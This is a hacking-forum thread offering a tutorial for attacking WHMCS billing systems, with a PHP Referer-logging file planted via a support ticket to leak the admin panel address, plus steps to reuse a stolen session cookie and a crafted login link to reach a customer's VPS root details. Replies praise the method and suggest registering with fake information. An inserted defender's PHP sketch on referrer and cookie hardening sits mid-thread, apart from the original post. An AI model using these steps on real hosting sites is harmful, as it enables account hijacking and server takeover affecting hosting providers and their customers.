MaDLeeTs • Cyber Security & Professional Webmasters Forum

Full Version: WHMCS Trick'z With XSS And Ref Link & rOoTiNg wiTh0u7 pAnEL
Hello Mad'z

How Are You Brother'z ?

Today ,,We're Going To Get Admin Panel Link OF WHMCS

We Need PHP File

PHP Code:
<?php 
# Admin Link Finder Via XSS 
# Don't Forget To Inject Code :) 
# WWW.SEC4EVER.COM 
#404 
echo "404 Page Not Found"
$url $_SERVER['HTTP_REFERER']; 
$urlx = @fopen("URL.txt","w"); 
@
fwrite($urlx,"====================================================================== 
URL/Admin Panel : 
$url 
====================================================================== 
"
); 
?>

This Code We Need .. Now Upload it For AnyServer And Just

Submit New Ticket In WHMCS To Support Admin And Send Link OF PHP File Like This You CAn Make Message

Code:
Hello

I Need To Make Like This Site
http://site.tld/file.php

waiting support
thanks
H4x0r

oke this message contains
http://site.tld/file.php
this is ouR coDe to inject oke now go to see URL.txt FIle

[Image: Nup09644.png]:P

This Was The 1st Trick xP

The 2Nd Trick Is After XSS Codes ,, We Always Get Cookie But We See Firewall On Admin Panel
Like This

[Image: gxj10095.png]

So Here We're

We Want To Bypass This Firewall And Get Root To X Client Smiley1

Assume We've This Information

Cookiez

Code:
PHPSESSID=34820c5cad7Da21205091c36b749D085

E-Mail OF Client


We Can Get Cookies From XSS / Xss-Shell <Browser Attack> Or Any HTML Injection Smiley1 That's Not Matter
E-Mail OF Client We Can Get it From WHo IS Service OF Domain / Target

Now We've To Check if The Email Address Is correct or incorrect

Request Reset Password

[Image: Ked10893.png]
And Here Put E-Mail To Check


if you get message with E-Mail Sent ,, So E-Mail Address is Correct

[Image: yM310980.png]
E-Mail Is Correct Smiley1 # Zuhahah =))

Now We'll Put Cookies in Browser ,, I'm Using FireFox With FireBug/Fire Co()kie Addon

[Image: nAZ11269.png]
[Image: f5T11298.png]

Create C00kie And Put As We've Then Type F5

And You'll Get iN The Top of Page

[Image: eGO11421.png]

But The Problem Now We Can't Access Admin Panel Sadsmiley Because OF Fire Wall

Oke Our Magic Is found Tonguesmiley

Now Use This Link

http://site.tld/whmcs/dologin.php?u s e r n a m [email protected]

Don't Use Spaces In u$ername But I Used Because OF Security

So You'll Be In ClientArea Now Tonguesmiley

[Image: CZW12352.png]
Discover The Services And Product'z

[Image: zUz12272.png]

It's VPS Tonguesmiley Go 2 View Detail'z

[Image: 8ix12498.png]

Root Access Is ready =))

Just Say Zuhahahaha Tonguesmiley

Zuhahahaha ,,, We Got it Greet'z

h4x0rl1f3
shadow008
1337
Dr.Zombie
KhantastiC
TNT_HACKER
Th3 MMA
Zombie_KSA
Spiral
I-Hmx
Sec4ever
MadLeets

./b0x
Www://MadLeets.CoM
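
Added example, not part of the original post and not WHMCS code: a defender's sketch of the two weaknesses the post above relies on, the admin-area URL leaking through the Referer header when staff follow a link from a ticket, and a session cookie that page script can read. All function names are hypothetical, and the array form of session_set_cookie_params assumes PHP 7.3 or later.

```php
<?php
// Added example (not WHMCS code); all function names are hypothetical.

// Stop browsers sending the admin-area URL as a Referer to any other site.
function send_admin_security_headers(): void
{
    header('Referrer-Policy: no-referrer');
}

// Session cookie that page script cannot read (HttpOnly) and that is only
// sent over HTTPS on same-site requests. Array form requires PHP 7.3+.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    session_start();
}

// Render untrusted ticket text: escape every piece, and link URLs with
// rel="noreferrer noopener" so a staff click carries no Referer.
function render_ticket_body(string $text): string
{
    $parts = preg_split('~(\bhttps?://[^\s<>"\']+)~i', $text, -1, PREG_SPLIT_DELIM_CAPTURE);
    $out = '';
    foreach ($parts as $i => $part) {
        $safe = htmlspecialchars($part, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        // Odd indexes hold the captured URLs, even indexes the text between them.
        $out .= ($i % 2 === 1)
            ? '<a href="' . $safe . '" rel="noreferrer noopener" target="_blank">' . $safe . '</a>'
            : $safe;
    }
    return nl2br($out);
}

// Constructed sample ticket, shaped like the message in the post.
if (PHP_SAPI === 'cli') {
    $ticket = "Hello\nI need a site like this\nhttp://site.tld/file.php\n<b>markup</b>";
    echo render_ticket_body($ticket), PHP_EOL;
}
```

The Referrer-Policy header covers links that staff copy and paste or open from other admin pages; the rel attribute covers clicks on the rendered ticket itself.
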
Hahahahahahahahahahahahaha
Just Awesome Bro Biggrinsmiley
That's way to sexy and full with Madness UnderTaker wink
Awesome shit wink
Aweso0000me Biggrinsmiley
Awesome tut. Biggrinsmiley
Great B0x Biggrinsmiley
1 thng some whmcs have login to submit ticket bro
for those any method to submit ticket
(09-26-2012, 07:10 PM)darksnipper Wrote: [ -> ]1 thng some whmcs have login to submit ticket bro
for those any method to submit ticket
well 99 % register users can submit, so you don't need to actually buy anything just register on web with fake info and submit wink
enjoy
okz thanx let me try it Smiley1

1 mre questioN
MUST THE WHMCS Vul to xsS?

its a GOD gifted exploit and its very nice bro
thanks Tonguesmiley